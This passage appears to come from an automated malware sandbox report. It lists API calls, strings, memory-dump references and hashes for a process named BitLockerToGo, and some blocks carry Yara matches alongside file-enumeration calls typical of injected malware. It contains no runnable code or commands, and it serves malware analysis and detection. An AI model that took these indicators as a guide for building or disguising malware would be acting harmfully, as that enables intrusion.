                                                                                                                                                                • memset.VCRUNTIME140(?,000000E5,?), ref: 6CCB1C39
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFE744), ref: 6CCB3391
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE744), ref: 6CCB33CD
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6CCB3431
                                                                                                                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCB3437
                                                                                                                                                                Strings
                                                                                                                                                                • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CCB37A8
                                                                                                                                                                • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CCB37BD
                                                                                                                                                                • MOZ_CRASH(), xrefs: 6CCB3950
                                                                                                                                                                • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CCB37D2
                                                                                                                                                                • <jemalloc>, xrefs: 6CCB3941, 6CCB39F1
                                                                                                                                                                • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6CCB3793
                                                                                                                                                                • : (malloc) Unsupported character in malloc options: ', xrefs: 6CCB3A02
                                                                                                                                                                • Compile-time page size does not divide the runtime one., xrefs: 6CCB3946
                                                                                                                                                                • MALLOC_OPTIONS, xrefs: 6CCB35FE
                                                                                                                                                                • MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCB3559, 6CCB382D, 6CCB3848
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                                                                                                                                                • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                • API String ID: 3040639385-4173974723
                                                                                                                                                                • Opcode ID: aaff8192e60127980e8342012cebb2350fef1279c03e25da514a75f9cb6a88db
                                                                                                                                                                • Instruction ID: d739de739412975674bdd00c636e27e34faebcd1c6914a6168340757178c63d4
                                                                                                                                                                • Opcode Fuzzy Hash: aaff8192e60127980e8342012cebb2350fef1279c03e25da514a75f9cb6a88db
                                                                                                                                                                • Instruction Fuzzy Hash: 50539C72A057018FD304CF6DC550616FBE1BF89328F29C66DE869AB791E771E842CB81
                                                                                                                                                                APIs
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3527
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD355B
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD35BC
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD35E0
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD363A
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3693
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD36CD
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3703
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD373C
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3775
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD378F
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3892
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD38BB
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3902
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3939
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3970
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD39EF
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3A26
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3AE5
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3E85
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3EBA
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD3EE2
                                                                                                                                                                  • Part of subcall function 6CCD6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CCD61DD
                                                                                                                                                                  • Part of subcall function 6CCD6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CCD622C
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD40F9
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD412F
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD4157
                                                                                                                                                                  • Part of subcall function 6CCD6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CCD6250
                                                                                                                                                                  • Part of subcall function 6CCD6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCD6292
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD441B
                                                                                                                                                                • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCD4448
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CCD484E
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CCD4863
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CCD4878
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CCD4896
                                                                                                                                                                • free.MOZGLUE ref: 6CCD489F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: floor$free$malloc$memcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3842999660-3916222277
                                                                                                                                                                • Opcode ID: 2d3974bef066973575abe39540f2cda2773d65d5217647b1cfcb06706ea182ee
                                                                                                                                                                • Instruction ID: 3e55474c4b183a292525d3da12273474c2a300b678471a094c0bf4fa8317f18a
                                                                                                                                                                • Opcode Fuzzy Hash: 2d3974bef066973575abe39540f2cda2773d65d5217647b1cfcb06706ea182ee
                                                                                                                                                                • Instruction Fuzzy Hash: C9F23F74508B808FC765CF28C08469AFBF1FFCA354F158A5EDA9997711EB31A486CB42
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CC864DF
                                                                                                                                                                • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CC864F2
                                                                                                                                                                • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CC86505
                                                                                                                                                                • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CC86518
                                                                                                                                                                • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC8652B
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CC8671C
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6CC86724
                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC8672F
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6CC86759
                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CC86764
                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CC86A80
                                                                                                                                                                • GetSystemInfo.KERNEL32(?), ref: 6CC86ABE
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CC86AD3
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC86AE8
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC86AF7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                • API String ID: 487479824-2878602165
                                                                                                                                                                • Opcode ID: d856067159371472e848ac31a26c2436b8de372dd7ce5d239327b1776ef818fc
                                                                                                                                                                • Instruction ID: fa33a6e91d32d0b6e23bb288392569b0aa248be8a82ea226c1b99de7eb6cecdf
                                                                                                                                                                • Opcode Fuzzy Hash: d856067159371472e848ac31a26c2436b8de372dd7ce5d239327b1776ef818fc
                                                                                                                                                                • Instruction Fuzzy Hash: A5F1E4709166199FDB20CF24DC88BDABBB5AF4631CF144299D819A3781F731AE85CF90
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 030138CC
                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 030138E3
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 03013935
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03020F70), ref: 03013947
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03020F74), ref: 0301395D
                                                                                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 03013C67
                                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 03013C7C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                                                                                                • API String ID: 1125553467-2524465048
                                                                                                                                                                • Opcode ID: 9a18c28beff2ce807e42f9ea49bf1b8a07ddb94f7ebeab7a059cf184c172c9f7
                                                                                                                                                                • Instruction ID: 732f1ba2bf26aeab5539e18155200a921f6d7c367b4aaebb415999a1a6f97e49
                                                                                                                                                                • Opcode Fuzzy Hash: 9a18c28beff2ce807e42f9ea49bf1b8a07ddb94f7ebeab7a059cf184c172c9f7
                                                                                                                                                                • Instruction Fuzzy Hash: 36A143B9A413189BDB64EFA4DC88FEE737CBB84300F048588E60D9A144EB759B94CF51
                                                                                                                                                                APIs
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCDC5F9
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCDC6FB
                                                                                                                                                                • memset.VCRUNTIME140(?,00000000,00004008), ref: 6CCDC74D
                                                                                                                                                                • memset.VCRUNTIME140(?,00000000,00004008), ref: 6CCDC7DE
                                                                                                                                                                • memset.VCRUNTIME140(?,00000000,00004014), ref: 6CCDC9D5
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCDCC76
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CCDCD7A
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCDDB40
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CCDDB62
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CCDDB99
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCDDD8B
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CCDDE95
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CCDE360
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCDE432
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CCDE472
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                                • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                                • Instruction ID: f6a9bd4ef93fb1b0424ed592a75e1c8ce38e83ada8e4f7ef76ae70d51a1a2f5c
                                                                                                                                                                • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                                • Instruction Fuzzy Hash: A5338E71E0021A8FCB14CF98C8806ADFBF2FF49314F1A4269DA55AB755E731B945CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFE7B8), ref: 6CC8FF81
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE7B8), ref: 6CC9022D
                                                                                                                                                                • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6CC90240
                                                                                                                                                                • EnterCriticalSection.KERNEL32(6CCFE768), ref: 6CC9025B
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6CCFE768), ref: 6CC9027B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                                                                                • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                • API String ID: 618468079-3577267516
                                                                                                                                                                • Opcode ID: f4b70039af31c47af34831e4311753ad19352eb2adfd60e3534423a8762264a9
                                                                                                                                                                • Instruction ID: 45ea70221fa4600cfe045fd8e0919109336664a38a278504f209c6ae81f9b90a
                                                                                                                                                                • Opcode Fuzzy Hash: f4b70039af31c47af34831e4311753ad19352eb2adfd60e3534423a8762264a9
                                                                                                                                                                • Instruction Fuzzy Hash: 11C2C071A057418FD714CF29C481716BBE1BF8A328F28C66DE8A98B795E771E841CB81
                                                                                                                                                                APIs
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,00004014), ref: 6CCDE811
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCDEAA8
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CCDEBD5
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCDEEF6
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCDF223
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CCDF322
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCE0E03
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?), ref: 6CCE0E54
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CCE0EAE
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CCE0ED4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                                • Opcode ID: db38d3f6450eb17e6eb1cf989597a86a7fe4aec3d975315dbcc3b621e69f4f12
                                                                                                                                                                • Instruction ID: 1cafc82d2463883f6daa45c12be696e4ae8cbac47933d1907be80cba8097173d
                                                                                                                                                                • Opcode Fuzzy Hash: db38d3f6450eb17e6eb1cf989597a86a7fe4aec3d975315dbcc3b621e69f4f12
                                                                                                                                                                • Instruction Fuzzy Hash: 5F637071E0025ACFCB14CFA8C8905DDFBB2FF89310F298269D955AB755E730A946CB90
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 03014580
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03014587
                                                                                                                                                                • wsprintfA.USER32 ref: 030145A6
                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 030145BD
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03020FC4), ref: 030145EB
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03020FC8), ref: 03014601
                                                                                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0301468B
                                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 030146A0
                                                                                                                                                                • lstrcat.KERNEL32(?,03554CD0), ref: 030146C5
                                                                                                                                                                • lstrcat.KERNEL32(?,03555930), ref: 030146D8
                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 030146E5
                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 030146F6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                                                                                                                                • String ID: %s\%s$%s\*
                                                                                                                                                                • API String ID: 671575355-2848263008
                                                                                                                                                                • Opcode ID: cbdcc0cc8fc651ccaf0eeff16f95596c7471de35bcbfb4eff1c5d7ddec7d1d06
                                                                                                                                                                • Instruction ID: 046e718d6d4c459eda111997f90149f24597592214265c127fe4e41929355ebb
                                                                                                                                                                • Opcode Fuzzy Hash: cbdcc0cc8fc651ccaf0eeff16f95596c7471de35bcbfb4eff1c5d7ddec7d1d06
                                                                                                                                                                • Instruction Fuzzy Hash: BC5166BA9412189BD764FBB0EC8CFED737CAB58300F408588F60996184EB7497958F91
                                                                                                                                                                APIs
                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6CC9EE7A
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CC9EFB5
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?), ref: 6CCA1695
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCA16B4
                                                                                                                                                                • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6CCA1770
                                                                                                                                                                • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CCA1A3E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$freemallocmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3693777188-0
                                                                                                                                                                • Opcode ID: 1422bd0469ef388628633e4ede38a625fea00d4c8649a32638e566f3f14fadb7
                                                                                                                                                                • Instruction ID: ca95c9c5d739a1db76de858e90b773d90882f5588eb795bd9917f6ac29b5302a
                                                                                                                                                                • Opcode Fuzzy Hash: 1422bd0469ef388628633e4ede38a625fea00d4c8649a32638e566f3f14fadb7
